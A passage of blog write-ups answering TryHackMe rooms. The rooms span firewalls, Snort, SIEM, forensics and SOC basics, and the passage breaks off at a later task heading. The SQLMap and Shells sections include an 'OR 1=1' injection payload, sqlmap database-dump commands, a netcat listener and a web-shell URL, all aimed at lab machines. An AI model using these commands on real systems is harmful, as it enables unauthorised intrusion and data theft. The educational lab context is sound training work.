4 ÷ 2 = 2 with a remainder of 0
2 ÷ 2 = 1 with a remainder of 0
1 ÷ 2 = 0 with a remainder of 1

Reading the remainders from the bottom up gives you 1001110. For 8-bit is 01001110.

What is the binary value of the decimal number 78?

01001110

What is the URL encoded value of https://tryhackme.com/r/careers?

https%3A%2F%2Ftryhackme.com%2Fr%2Fcareers%3F

Task 6: Your First Official CookURL Decode

Using the file you downloaded in Task 5, which IP starts and ends with "10"?

10.10.2.10

What is the base64 encoded value of the string "Nice Room!"?

TmljZSBSb29tIQ==

What is the URL decoded value for https%3A%2F%2Ftryhackme%2Ecom%2Fr%2Froom%2Fcyberchefbasics?

https://tryhackme.com/r/room/cyberchefbasics

What is the datetime string for the Unix timestamp 1725151258?

Sun 1 September 2024 00:40:58 UTC

What is the Base85 decoded string of the value <+oue+DGm>Ap%u7?

This is fun!

Task 7: Conclusion

I will have CyberChef, the Swiss Army knife of cyber security, ready for my upcoming journeys!

No answer needed

Firewall Fundamentals | TryHackMe Write-Up

Thu, 02 Oct 2025 00:00:00 GMT

Here i want to share about my write-up for the room Firewall Fundamentals (Premium Room), learn about firewalls and get hands-on with Windows and Linux built-in firewalls. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: What Is the Purpose of a Firewall

A firewall is designed to inspect a network's or digital device’s incoming and outgoing traffic.

Learning Objectives

After completing the room, you will have a basic understanding of the following areas:

The types of firewalls
The firewall rules and its components
Hands-on Windows built-in firewall
Hands-on Linux built-in firewall

Room Prerequisites

Networking Concepts

Which security solution inspects the incoming and outgoing traffic of a device or a network?

Firewall

Task 2: Types of Firewalls

There are many different types of firewalls, and they work on different OSI model layers.

Stateless Firewall
Stateful Firewall
Proxy Firewall
Next-Generation Firewall (NGFW)

Which type of firewall maintains the state of connections?

stateful firewall

Which type of firewall offers heuristic analysis for the traffic?

Next-Generation Firewall

Which type of firewall inspects the traffic coming to an application?

Proxy firewalls

Task 3: Rules in Firewalls

The basic components of a firewall’s rule are:

Source address
Destination address
Port
Protocol
Action
Direction

Three main actions can be applied to a rule:

Allow
Deny
Forward

Firewalls have different categories of rules based on traffic directionality:

Inbound Rules
Outbound Rules

Which type of action should be defined in a rule to permit any traffic?

allow

What is the direction of the rule that is created for the traffic leaving our network?

outbound

Task 4: Windows Defender Firewall

Windows Defender is a built-in firewall introduced by Microsoft in the Windows OS.

What is the name of the rule that was created to block all incoming traffic on the SSH port?

Core Op

A rule was created to allow SSH from one single IP address. What is the rule name?

Infra team

Which IP address is allowed under this rule?

192.168.13.7

Task 5: Linux iptables Firewall

Linux offers the functionality of a built-in firewall.

Netfilter

Netfilter is the framework inside the Linux OS with core firewall functionalities, including packet filtering, NAT, and connection tracking. Common firewall utilities that utilize this framework are iptables, nftables, and firewalld.

ufw (Uncomplicated Firewall)

ufw, as the name says, eliminates the complications of making rules in a complex syntax by giving you an easier interface. Some basic ufw commands include:

sudo ufw status: To check the status of the firewall.
sudo ufw enable: To enable the firewall.
sudo ufw deny 22/tcp: To deny incoming traffic on a specific port.
sudo ufw status numbered: To list all active rules in a numbered order.
sudo ufw delete <number>: To delete a rule.

Which Linux firewall utility is considered to be the successor of "iptables"?

nftables

What rule would you issue with ufw to deny all outgoing traffic from your machine as a default policy? (answer without sudo)

ufw default deny outgoing

IDS Fundamentals | TryHackMe Write-Up

Thu, 02 Oct 2025 00:00:00 GMT

Here i want to share about my write-up for the room IDS Fundamentals (Premium Room), learn the fundamentals of IDS, along with the experience of working with Snort. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: What Is an IDS

If an attacker successfully bypasses a firewall and performs malicious activities inside the network, there should be something to detect it timely. This solution is known as an Intrusion Detection System (IDS).

Can an intrusion detection system (IDS) prevent the threat after it detects it? Yea/Nay

Nay

Task 2: Types of IDS

An IDS’s main categorization depends on its deployment and detection modes.

Deployment Modes

Host Intrusion Detection System (HIDS)
Network Intrusion Detection System (NIDS)

Detection Modes

Signature-Based IDS
Anomaly-Based IDS
Hybrid IDS

Which type of IDS is deployed to detect threats throughout the network? ?Network Intrusion Detection System

Which IDS leverages both signature-based and anomaly-based detection techniques?

Hybrid IDS

Task 3: IDS Example: Snort

Snort is one of the most widely used open-source IDS solutions that uses signature-based and anomaly-based detections to identify known threats.

Modes of Snort

Packet sniffer mode
Packet logging mode
Network Intrusion Detection System mode

Which mode of Snort helps us to log the network traffic in a PCAP file?

packet logging mode

What is the primary mode of Snort called?

Network Intrusion Detection System Mode

Task 4: Snort Usage

Rule Format

Action: Specifies which action to take when the rule triggers.
Protocol: Refers to the protocol that matches this rule.
Source/Destination IP & Port: Determines the origin and destination of the traffic.
Rule metadata: Defined at the end of the rule in parentheses, including Message (msg), Signature ID (sid), and Rule revision (rev).

Where is the main directory of Snort that stores its files?

/etc/snort

Which field in the Snort rule indicates the revision number of the rule?

rev

Which protocol is defined in the sample rule created in the task?

tcmp

What is the file name that contains custom rules for Snort?

local.rules

Task 5: Practical Lab

The task is to run Snort on this PCAP file. The PCAP file is placed in the /etc/snort/ directory.

What is the IP address of the machine that tried to connect to the subject machine using SSH?

10.11.90.211

What other rule message besides the SSH message is detected in the PCAP file?

Ping Detected

What is the sid of the rule that detects SSH?

1000002

Vulnerability Scanner Overview | TryHackMe Write-Up

Thu, 02 Oct 2025 00:00:00 GMT

Here i want to share about my write-up for the room Vulnerability Scanner Overview (Premium Room), learn about vulnerability scanners and how they work in a practical scenario. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: What Are Vulnerabilities?

Vulnerabilities are weaknesses in software or hardware, similar to small holes in a roof. The process of fixing these vulnerabilities is known as Patching.

What is the process of fixing the vulnerabilities called?

Patching

Task 2: Vulnerability Scanning

The major categorizations of these scans are:

Authenticated vs. Unauthenticated Scans: Authenticated scans require the subject host's credentials and are more detailed. Unauthenticated scans are conducted without providing any credentials and help identify the threat surface from outside the host.
Internal vs. External Scans: Internal scans are conducted from inside the network, while external scans are conducted from outside the network.

Which type of vulnerability scans require the credentials of the target host?

authenticated

Which type of vulnerability scan focuses on identifying the vulnerabilities that can be exploited from outside the network?

External

Task 3: Tools for Vulnerability Scanning

Here's some of widely used vulnerability scanners.

Nessus: It is a proprietary software with extensive vulnerability scanning options, widely used by large enterprises. Nessus needs to be deployed and managed on-premises.
Qualys: A subscription-based vulnerability management solution. The best thing about Qualys is that it is a cloud-based platform.
Nexpose: A subscription-based solution that continuously discovers new assets and performs vulnerability scans. It offers both on-premises and hybrid deployment modes.
OpenVAS: An open-source vulnerability assessment solution that offers basic features. It is beneficial for small organizations and individual systems.

Almost all vulnerability scanners offer reporting capabilities. They generate a detailed report after every scan containing a list of the vulnerabilities discovered, their risk scores, and detailed descriptions. When choosing a suitable scanner, you must consider the scope, resources, and depth of analysis.

Is Nessus currently an open-source vulnerability scanner? (Yea/Nay)

Nay

Which company developed the Nexpose vulnerability scanner?

Rapid7

What is the name of the open-source vulnerability scanner developed by Greenbone Security?

OpenVAS

Task 4: CVE & CVSS

CVE (Common Vulnerabilities and Exposures) is a unique number given to vulnerabilities. Whenever a new vulnerability is discovered in any software application, it is given a unique CVE number as a reference and published online in a CVE database. A CVE number has the prefix “CVE”, the year it was discovered, and four or more arbitrary digits.

CVSS (Common Vulnerability Scoring System) is a score that tells the severity of a vulnerability. The CVSS score is calculated by considering multiple factors, including its impact and ease of exploitability. The severity levels as per the CVSS scores are:

Low: 0.0-3.9
Medium: 4.0-6.9
High: 7.0-8.9
Critical: 9.0-10

CVE stands for?

Common Vulnerabilities and Exposures

Which organization developed CVE?

MITRE Corporation

What would be the severity level of the vulnerability with a score of 5.3?

Medium

Task 5: OpenVAS

OpenVAS is a complete open-source vulnerability scanner.

What is the IP address of the machine scanned in this task?

10.10.154.44

How many vulnerabilities were discovered on this host?

13

Task 6: Practical Exercise

What is the score of the single high-severity vulnerability found in the scan?

10

What is the solution suggested by OpenVAS for this vulnerability?

Change the password of the mentioned account(s).

Incident Response Fundamentals | TryHackMe Write-Up

Sat, 27 Sep 2025 00:00:00 GMT

Here i want to share about my write-up for the room Digital Forensics Fundamentals (Premium Room), learn about digital forensics and related processes and experiment with a practical example. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction to Incident Response

Incident Response handles an incident from its start to end. From deploying security in several areas to prevent incidents to fighting with them and minimizing their impact, incident response is a thorough guideline.

Learning Objectives

Overview of what are incidents and their severity levels
Common types of incidents
Phases of Incident Response from SANS and NIST Frameworks
Tools for Incident Detection and Response along with the role of PlayBooks
Incident Response Plan

Room Pre-Requisites

Intro to Defensive Security

Click me to proceed to the next task.

No answer needed

Task 2: What are Incidents?

The security team analyzes these alerts.

False positives are alerts that point to something dangerous but are not harmful.
True positives are alerts that point to something harmful and are actually dangerous.

What is triggered after an event or group of events point at a harmful activity?

Alert If a security solution correctly identifies a harmful activity from a set of events, what type of alert is it? true positive

If a fire alarm is triggered by smoke after cooking, is it a true positive or a false positive?

false positive

Task 3: Types of Incidents

A short summary of the text is provided below.

Types of Security Incidents

There are several types of security incidents that can occur independently or altogether within the same victim. These incidents include:

Malware Infections
Security Breaches
Data Leaks
Insider Attacks
Denial Of Service (DoS) Attacks

A user's system got compromised after downloading a file attachment from an email. What type of incident is this?

malware infection

What type of incident aims to disrupt the availability of an application?

Denial of service

Task 4: Incident Response Process

Incident Response Frameworks are the generic approaches to follow in any incident for effective response. The two widely used incident response frameworks are SANS and NIST.

The SANS incident Response framework has 6 phases:

Preparation: Building the necessary resources to handle an incident.
Identification: Looking for any abnormal behavior that may indicate an incident.
Containment: Minimizing the impact of the attack.
Eradication: Removing the threat from the attacked environment.
Recovery: Recovering the affected systems from backup or rebuilding them.
Lessons Learned: Gaps in the detection and analysis of the incident are identified and documented.

The Security team disables a machine's internet connection after an incident. Which phase of the SANS IR lifecycle is followed here?

containment

Which phase of NIST corresponds with the lessons learned phase of the SANS IR lifecycle?

Post Incident Activity

Task 5: Incident Response Techniques

There are multiple security solutions that serve unique roles in detecting incidents.

SIEM: Collects important logs in one centralized location and correlates them to identify incidents.
AV: Antivirus detects known malicious programs in a system and regularly scans system.
EDR: Endpoint Detection and Response is deployed on every system, protecting it against some advanced-level threats and can also contain and eradicate the threat.

Playbooks are the guidelines for a comprehensive incident response and provide step-by-step instructions to deal with each kind of incident.

Runbooks, on the other hand, are the detailed, step-by-step execution of specific steps during different incidents.

Step-by-step comprehensive guidelines for incident response are known as?

Playbooks

Task 6: Lab Work Incident Response

Click on the View Site button below to display the lab on the right side of the screen.

What was the name of the malicious email sender?

Jeff Johnson

What was the threat vector?

Email Attachment

How many devices downloaded the email attachment?

3

How many devices executed the file?

1

What is the flag found at the end of the exercise?

THM{__________________________}

Task 7: Conclusion

Complete the room.

No answer needed

Introduction to SIEM | TryHackMe Write-Up

Sat, 27 Sep 2025 00:00:00 GMT

Here i want to share about my write-up for the room Introduction to SIEM, an introduction to Security Information and Event Management. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

SIEM stands for Security Information and Event Management system. It is a tool that collects data from various endpoints/network devices across the network, stores them at a centralized place, and performs correlation on them.

What does SIEM stand for?

Security Information and Event Management system

Task 2: Network Visibility through SIEM

Network log sources can be divided into two logical parts: Host-Centric Log Sources and Network-Centric Log Sources.

Host-Centric Log Sources capture events that occurred within or related to the host.
Network-Centric Log Sources are generated when the hosts communicate with each other or access the internet.

Some key features provided by SIEM are:

Real-time log Ingestion
Alerting against abnormal activities
24/7 Monitoring and visibility
Ability to investigate past incidents

Is Registry-related activity host-centric or network-centric?

host-centric

Is VPN related activity host-centric or network-centric?

network-centric

Task 3: Log Sources and Log Ingestion

Common Devices

Windows Machine: Windows records that can be viewed through the Event Viewer utility.
Linux Workstation: Linux OS stores related logs in common locations such as /var/log/httpd, /var/log/auth.log, and /var/log/kern.
Web Server: It is important to keep an eye on all the requests/responses coming in and out of the webserver.

Log Ingestion

Some common methods used by SIEM solutions for ingesting logs are:

Agent / Forwarder
Syslog
Manual Upload
Port-Forwarding

In which location within a Linux environment are HTTP logs stored?

/var/log/httpd

Task 4: Why SIEM

Read the task above.

No answer needed

Task 5: Analysing Logs and Alerts

Which Event ID is generated when event logs are removed?

104

What type of alert may require tuning?

False Alarm

Task 6: Lab Work

Click on Start Suspicious Activity, which process caused the alert?

cudominer.exe

Find the event that caused the alert, which user was responsible for the process execution?

chris.fort

What is the hostname of the suspect user?

HR_02

Examine the rule and the suspicious process; which term matched the rule that caused the alert?

miner

What is the best option that represents the event? Choose from the following:

False-Positive
True-Positive

True-Positive

Selecting the right ACTION will display the FLAG. What is the FLAG?

THM{000_SIEM_INTRO}

Task 7: Conclusion

Complete this room.

No answer needed

Logs Fundamentals | TryHackMe Write-Up

Sat, 27 Sep 2025 00:00:00 GMT

Here i want to share about my write-up for the room Logs Fundamentals (Premium Room), learn what logs are and how to analyze them for effective investigation. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction to Logs

Logs are the digital footprints left behind by any activity. Tracing down the activity and the individual behind the execution of that activity becomes easier through logs.

Logs play an integral role in several key areas:

Security Events Monitoring
Incident Investigation and Forensics
Troubleshooting
Performance Monitoring
Auditing and Compliance

Where can we find the majority of attack traces in a digital system?

logs

Task 2: Types of Logs

Logs are segregated into multiple categories according to the type of information they provide, so you just need to look into the specific log file for which the issue relates.

System Logs: Helpful in troubleshooting running issues in the OS.
Security Logs: Help detect and investigate security-related incidents.
Application Logs: Contain specific events related to an application.
Audit Logs: Provide detailed information on system changes and user events.
Network Logs: Provide information on the network’s outgoing and incoming traffic.
Access Logs: Provide detailed information about access to different resources.

Which type of logs contain information regarding the incoming and outgoing traffic in the network?

Network Logs

Which type of logs contain the authentication and authorization events?

Security Logs

Task 3: Windows Event Logs Analysis

Windows OS logs many activities in log files. Some crucial types of logs are Application, System, and Security.

Based on the table of important Event IDs from the previous task, the event we are looking for is:

Event ID 4720: A user account was created.

What is the name of the last user account created on this system?

hacked

Which user account created the above account?

administrator

On what date was this user account enabled? Format: M/D/YYYY

6/7/2024

Based on the information from the previous task, the relevant Event ID is: Event ID 4724: An attempt was made to reset an account’s password.

Did this account undergo a password reset as well? Format: Yes/No

yes

Task 4: Web Server Access Logs Analysis

All requests we make to a website are logged and stored in a log file on the web server. This log file contains all the requests made to the website along with information such as:

IP Address
Timestamp
Request (HTTP Method, URL, Status Code)
User-Agent

We can perform manual log analysis by using some command line utilities in the Linux operating system.

cat: for displaying the contents of a text file.
grep: allows us to search for strings and patterns inside a log file.
less: handling multiple log files and helps us view one page at a time.

10.0.0.1 - - [06/Jun/2024:13:54:44] "GET /contact HTTP/1.1" 500 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"

What is the IP which made the last GET request to URL: “/contact”?

10.0.0.1

When was the last POST request made by IP: “172.16.0.1”?

06/Jun/2024:13:55:44

Based on the answer from question number 2, to which URL was the POST request made?

/contact

Task 5: Conclusion

Complete the room.

No answer needed

Digital Forensics Fundamentals | TryHackMe Write-Up

Wed, 24 Sep 2025 00:00:00 GMT

Task 1: Introduction to Digital Forensics

Forensics is the application of methods and procedures to investigate and solve crimes. The branch of forensics that investigates cyber crimes is known as digital forensics. Cyber crime is any criminal activity conducted on or using a digital device.

Digital forensics teams follow procedures for collecting, storing, analyzing, and reporting evidence.

Which team was handed the case by law enforcement?

digital forensics

Task 2: Digital Forensics Methodology

NIST defines a process of digital forensics in four phases:

Collection
Examination
Analysis
Reporting

Which phase of digital forensics is concerned with correlating the collected data to draw any conclusions from it?

Analysis

Which phase of digital forensics is concerned with extracting the data of interest from the collected evidence?

Examination

Task 3: Evidence Acquisition

Acquiring evidence is a critical job. Some general practices must be followed while the evidence is acquired.

Proper Authorization
Chain of Custody
Use of Write Blockers

Which tool is used to ensure data integrity during the collection?

write blocker

What is the name of the document that has all the details of the collected digital evidence?

chain of custody

Task 4: Windows Forensics

Disk Images:
- FTK Imager is a widely used tool for taking disk images.
- Autopsy is a popular open-source platform for conducting extensive analysis of an acquired disk image.
Memory Images:
- DumpIt offers the utility of taking a memory image from a Windows operating system
- Volatility is a powerful open-source tool for analyzing memory images.

Which type of forensic image is taken to collect the volatile data from the operating system?

Memory Image

Task 5: Practical Example of Digital Forensics

Everything we do on our digital devices leaves traces.

In this scenario, a kidnapper has sent a document. We can learn from the file's metadata.

PDF Metadata Analysis

Much information gets kept within a file’s metadata when you use a more advanced editor, such as MS Word. We can try to read the metadata using the program pdfinfo, which displays various metadata related to a PDF file, such as the author, creator, and creation date.

Photo EXIF Data

EXIF is a standard for saving metadata to image files. Because smartphones are equipped with a GPS sensor, finding GPS coordinates embedded in the image is highly probable. One command-line tool is exiftool, which is used to read and write metadata in various file types, such as JPEG images.

Using pdfinfo, find out the author of the attached PDF file, ransom-letter.pdf.

Ann Gree Shepherd

The GPS coordinates we get from exiftool should be written as 51°30'51.9"N 0°05'38.7"W and then we can search in google maps like this: https://www.google.com/maps/place/51%C2%B030'51.9%22N+0%C2%B005'38.7%22W

Using exiftool or any similar tool, try to find where the kidnappers took the image they attached to their document. What is the name of the street?

milk street

We can run this following command: exiftool PHOTO.jpg | grep Camera

What is the model name of the camera used to take this photo?

canon eos r6

SOC Fundamentals | TryHackMe Write-Up

Wed, 24 Sep 2025 00:00:00 GMT

Here i want to share about my write-up for the room SOC Fundamentals, learn about the SOC team and their processes. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction to SOC

This room will delve into some key concepts of SOC, one of the most important fields in defensive security.

Learning Objectives

Building a baseline for SOC (Security Operations Center)
Detection and response in SOC
The role of People, Processes, and Technology
Practical exercise

What does the term SOC stand for?

Security Operations Center

Task 2: Purpose and Components

Detection

Detect vulnerabilities
Detect unauthorized activity
Detect policy violations
Detect intrusions

Response

Support with the incident response

The SOC team discovers an unauthorized user is trying to log in to an account. Which capability of SOC is this?

Detection

What are the three pillars of a SOC?

People, Process, Technology

Task 3: People

Alert triage and reporting is the responsibility of?

SOC Analyst (Level 1)

Which role in the SOC team allows you to work dedicatedly on establishing rules for alerting security solutions?

Detection Engineer

Task 4: Process

At the end of the investigation, the SOC team found that John had attempted to steal the system's data. Which 'W' from the 5 Ws does this answer?

who

The SOC team detected a large amount of data exfiltration. Which 'W' from the 5 Ws does this answer?

what

Task 5: Technology

Which security solution monitors the incoming and outgoing traffic of the network?

Firewall

Do SIEM solutions primarily focus on detecting and alerting about security incidents? (yea/nay)

yea

Task 6: Practical Exercise of SOC

We can follow the instructions below.

The answer is a false positive because that is part of normal operation.

What: Activity that triggered the alert?

Port Scan

When: Time of the activity?

June 12, 2024 17:24

Where: Destination host IP?

10.0.0.3

Who: Source host name?

Nessus

Why: Reason for the activity? Intended/Malicious Intended

Additional Investigation Notes: Has any response been sent back to the port scanner IP? (yea/nay)

yea

What is the flag found after closing the alert?

THM{000_INTRO_TO_SOC}

Task 7: Conclusion

I understand the fundamentals of a SOC.

No answer needed

SQLMap: The Basics | TryHackMe Write-Up

Tue, 16 Sep 2025 00:00:00 GMT

Here i want to share about my write-up for the room Shells Overview, learn about the different types of shells. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

Learning Objectives

SQL injection vulnerability
Hunting SQL injection through the SQLMap tool

Room Prerequisites

While having a solid SQL Fundamentals knowledge is helpful, it is not required to complete this room.

Which language builds the interaction between a website and its database?

Sql

Task 2: SQL Injection Vulnerability

When input is improperly sanitized, attackers can manipulate the input and write SQL queries to perform SQL injection attacks.

For example, on a login page, an attacker can change the query from SELECT * FROM users WHERE username = 'John' AND password = '...' to the following by entering abc' OR 1=1;-- - as the password:

SELECT * FROM users WHERE username = 'John' AND password = 'abc' OR 1=1;-- -';

Because 1=1 is always true, it will ignore the random password and successfully execute the query, logging the attacker into John's account. The -- - comments out the rest of the original query.

Which boolean operator checks if at least one side of the operator is true for the condition to be true?

OR

Is 1=1 in an SQL query always true? (YEA/NAY)

YEA

Task 3: Automated SQL Injection Tool

SQLMap is an automated tool for detecting and exploiting SQL injection vulnerabilities in web applications. For beginners, the --wizard flag will guide us through each step.

We can test a URL that uses GET parameters with the -u flag. After finding a vulnerability, we can use other flags to extract information:

--dbs to extract all the database names.
-D [database_name] --tables to extract tables from a specific database.
-D [database_name] -T [table_name] --dump to extract records from a table.

For POST-based testing, we can use the command sqlmap -r [intercepted_request.txt].

Which flag in the SQLMap tool is used to extract all the databases available?

--dbs

What would be the full command of SQLMap for extracting all tables from the "members" database? (Vulnerable URL: http://sqlmaptesting.thm/search/cat=1)

sqlmap -u http://sqlmaptesting.thm/search/cat=1 -D members --tables

Task 4: Practical Exercise

This task is to test SQL injection vulnerabilities on a login page hosted at http://MACHINE_IP/ai/login.

Since the GET parameters are not visible in the URL, we need to use the browser's inspect option and the Network tab to find the complete URL after a test login attempt. Alternatively, we can use the URL: http://MACHINE_IP/ai/includes/user_login?email=test&password=test.

We can run this following command sqlmap -u 'http://MACHINE_IP/ai/includes/user_login?email=test&password=test' --dbs

How many databases are available in this web application?

6

We can run this following command sqlmap -u 'http://MACHINE_IP/ai/includes/user_login?email=test&password=test' -D ai --tables

What is the name of the table available in the "ai" database?

user

We can run this following command `sqlmap u 'http://MACHINE_IP/ai/includes/user_login?email=test&password=test' --dbs --tables -D ai -T user --dump

What is the password of the email test@chatai.com?

12345678

Shells Overview | TryHackMe Write-Up

Mon, 15 Sep 2025 00:00:00 GMT

Here i want to share about my write-up for the room Shells Overview, learn about the different types of shells. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Room Introduction

Shells in cyber security are widely used by attackers to remotely control systems.

In this room, we'll explore different shells, including how to set up and use Reverse and Bind Shells and deploy Web Shells.

The focus is on understanding how shells work without the use of Metasploit or other Frameworks.

Click to complete the task.

No Answer Needed

Task 2: Shell Overview

A shell is software that allows a user to interact with an OS.

In cyber security, it commonly refers to a specific shell session an attacker uses when accessing a compromised system, allowing them to run commands, execute software remotely, and perform a wide range of post-exploitation activities.

What is the command-line interface that allows users to interact with an operating system?

Shell

What process involves using a compromised system as a launching pad to attack other machines in the network?

Pivoting

What is a common activity attackers perform after obtaining shell access to escalate their privileges?

Privilege Escalation

Task 3: Reverse Shell

A reverse shell is a technique where connections initiate from the target system to the attacker's machine, which can help avoid detection from network firewalls.

An attacker uses a tool like Netcat to listen for a connection. A reverse shell payload is then executed on the target, which exposes the shell through the network.

Once executed, the attacker will receive a reverse shell, allowing them to execute commands as if they were logging into a regular terminal.

What type of shell allows an attacker to execute commands remotely after the target connects back?

Reverse Shell

What tool is commonly used to set up a listener for a reverse shell?

Netcat

Task 4: Bind Shell

A bind shell binds a port on the compromised system and listens for a connection. When this connection occurs, it exposes the shell session so the attacker can execute commands remotely.

This method can be used when the compromised target does not allow outgoing connections. On the target, a command is executed to listen for incoming connections; the attacker then uses Netcat to connect and get a shell.

What type of shell opens a specific port on the target for incoming connections from the attacker?

Bind Shell

Listening below which port number requires root access or privileged permissions?

1024

Task 5: Shell Listeners

This text explores tools that can be used as listeners to interact with an incoming reverse shell.

The tools covered are:

Rlwrap: A utility that provides editing keyboard and history.
Ncat: An improved version of Netcat with extra features, like encryption (SSL).
Socat: A utility that allows you to create a socket connection between two data sources.

Which flexible networking tool allows you to create a socket connection between two data sources?

socat

Which command-line utility provides readline-style editing and command history for programs that lack it, enhancing the interaction with a shell listener?

rlwrap

What is the improved version of Netcat distributed with the Nmap project that offers additional features like SSL support for listening to encrypted shells?

ncat

Task 6: Shell Payloads

A Shell Payload is a command or script that exposes the shell for a reverse or bind shell.

The text provides various reverse shell payloads that can be used in the Linux OS, with examples using:

Bash
PHP
Python
Telnet
AWK
BusyBox

Which Python module is commonly used for managing shell commands and establishing reverse shell connections in security assessments?

subprocess

What shell payload method in a common scripting language uses the exec, shell_exec, system, passthru, and popen functions to execute commands remotely through a TCP connection?

PHP

Which scripting language can use a reverse shell by exporting environment variables and creating a socket connection?

Python

Task 7: Web Shell

A web shell is a script written in a language supported by a compromised web server that executes commands through the web server itself. It can be hidden within a compromised web application or service, making it difficult to detect.

Web shells can be written in languages like PHP, ASP, and JSP. After the web shell is deployed, it can be accessed through a URL to execute a command and display the result in the web browser.

What vulnerability type allows attackers to upload a malicious script by failing to restrict file types?

Unrestricted File Upload

What is a malicious script uploaded to a vulnerable web application to gain unauthorized access?

Web Shell

Task 8: Practical Task

To test our knowledge, let's get the flag from the vulnerable web server by clicking the Start Machine button.

The challenge will be accessible on the following URLs:

[MACHINE_IP]:8081 hosts the web application that is vulnerable to command injection.
[MACHINE_IP]:8082 hosts the web application that is vulnerable to an unrestricted file upload.

Using a reverse or bind shell, exploit the command injection vulnerability to get a shell. What is the content of the flag saved in the / directory?

First, we can run nc -lnvp 4444.

And then, open a new terminal and run this command to know what IP we have: ip addr show tun0

Open the browser, go to [MACHINE_IP]:8080, and click "Reverse/Bind Shell Tank".

And then, you can fill the input field** with this reverse shell command

And then, our listener will get a connection and we can get the flag.

THM{0f28b3e1b00becf15d01a1151baf10fd713bc625}

Using a web shell, exploit the unrestricted file upload vulnerability and get a shell. What is the content of the flag saved in the / directory?

We can go to [MACHINE_IP]:8082.

And then, we can create a file named shell.php with this script:

Keep the listener running on port 4444.

We can upload the shell.php file to the website until the upload is successful.

And then, go to this URL [MACHINE_IP]:8082/uploads/shell.php?cmd=cat%20/flag.txt and we get the flag.

THM{202bb14ed12120b31300cfbbbdd35998786b44e5}

Task 9: Conclusion

Reverse Shells establish a connection from a compromised machine back to an attacker's system. Bind Shells listen for incoming connections on a compromised machine, and Web Shells offer attackers a unique avenue for exploiting vulnerabilities in web applications.

No Answer Needed

Common Attacks | TryHackMe Write-Up

Sun, 14 Sep 2025 00:00:00 GMT

Here i want to share about my write-up for the room Common Attacks, with practical exercises see how common attacks occur, and improve your cyber hygiene to stay safer online. I wrote this in 2025 and hope it is useful for learning about cybersecurity.

Task 1: Introduction

Let's get started!

No Answer Needed

Task 2: Social Engineering

Social Engineering is the term used to describe any cyberattack where a human is the target, sometimes referred to as "People Hacking". These attacks can become very complex, are often multi-layered, and escalate due to the snowball effect, potentially leading to an attacker gaining control over a target's life.

Other forms of social engineering include dropping USB storage devices in public or leaving malicious "charging cables" in the hope that someone will plug them into a computer. The Stuxnet virus, for example, originally infected its target by having workers plug in malicious USB devices they found.

To stay safe, you should:

Set up multiple forms of authentication.
Never plug external media into a computer you care about.
Always insist on proof of identity when a stranger calls or messages you claiming to work for a company.

Read the task information and watch the attached videos

No answer needed

What was the original target of Stuxnet?

The Iran Nuclear Programme

Task 3: Social Engineering: Phishing

Phishing is a sub-section of social engineering where an attacker tricks a victim into opening a malicious webpage by sending them a text message, email, or other online correspondence. The victim is then often asked to enter sensitive information, like login details or credit card information.

There are three primary types of phishing attacks: General Phishing, Spearphishing, and Whaling.

To identify phishing, look for poor grammar, similar but not identical domain names, and suspicious "From" email addresses.

To stay safe:

Delete unknown or untrusted emails.
Never open attachments from untrusted emails.
Do not click on embedded links in emails or messages.

Phising Email (The link actually goes to a different website than advertised.)

Phising Email (There is a misspelling in the domain name of the sender. It only contains one g instead of two.)

Email Looks Safe

Phising Email (Don't trust pdf file attachments that are not from a trusted source or unexpected as they could contain malware .)

What is the flag?

THM{I_CAUGHT_ALL_THE_PHISH}

Task 4: Malware and Ransomware

Malware is any software designed to perform malicious actions on behalf of an attacker, such as to steal information, cause damage, or execute arbitrary commands.

Ransomware is a specialised class of malware used to infect as many systems as possible, encrypting the data on the devices and holding it to ransom.

Delivery methods often revolve around social engineering or phishing attacks, such as sending an email containing a file with a malicious macro.

To stay safe:

Always accept updates and patches.
Never click on suspicious links or open file attachments.
Always back up important data.
Make sure antivirus software is always up-to-date.
If infected with ransomware, do not pay the ransom; instead, call your local authorities.

[Research] What currency did the Wannacry attackers request payment in?

Bitcoin

Task 5: Passwords and Authentication

Passwords are an integral part of most authentication systems, but even a robust password is useless if the same password is used for more than one service.

Current best practices for strong passwords lean more towards length than complexity. The most secure option is using long, completely random passwords, which is mitigated by using a password manager. A weak password is any password that could easily be guessed. Of equal importance to password strength is password reuse.

The industry-standard password storage method is password hashing. If a service gets hacked and passwords are leaked, attackers can perform "credential stuffing" attacks — using your stolen username and password pair against other services.

Put yourself in the shoes of a malicious hacker. You have managed to dump the password database for an online service, but you still have to crack those hashes!

Click the green button at the start of the task to deploy the interactive hash brute-forcer!

No Answer Needed

Based on the content of the website, you have generated a list of likely passwords, which is as follows:

TryH@ckMe
TryHackMe123
THM123456
qwertyuiop123
TryHackMe2021
TryHackMe123!
TryHackMe345
TryHackM3!

Copy the list of passwords into the "Password List" field of the hash cracker, then click "Go"!

No Answer Needed

Look at the "Current Word / Hash" section of the hash cracker.

Notice that for each word in the list you entered, the cracker is creating an MD5 hash of the word then comparing it to the Target Hash. If the two hashes match then the password has been found!

The hash cracker should find the password that matches the target hash very quickly.

What is the password?

TryHackMe123!

This is a very simple, browser-based example; however, in reality local hash cracking with a wordlist isn't any more complex from a high-level perspective — it's the same technique, but with a lot more potential passwords!

Hopefully this example illustrates why it is so important to choose a strong password — even if the passwords are hashed appropriately.

In the next task we will look at some of the common account protection measures, as well as how to generate secure passwords.

No Answer Needed

Task 6: Multi-Factor Authentication and Password Managers

Multi-Factor Authentication (MFA) is any authentication process where you need more than one thing to log in. You should always activate multi-factor authentication where available, using an "Authenticator App".

Password Managers provide a safe space to store your passwords in encrypted "vaults" accessed using a master password. They are the recommended way to handle authentication for your many accounts and can be used to generate long, completely random passwords.

Where you have the option, which should you use as a second authentication factor between SMS based TOTPs or Authenticator App based TOTPs (SMS or App)?

App

Task 7: Public Network Safety

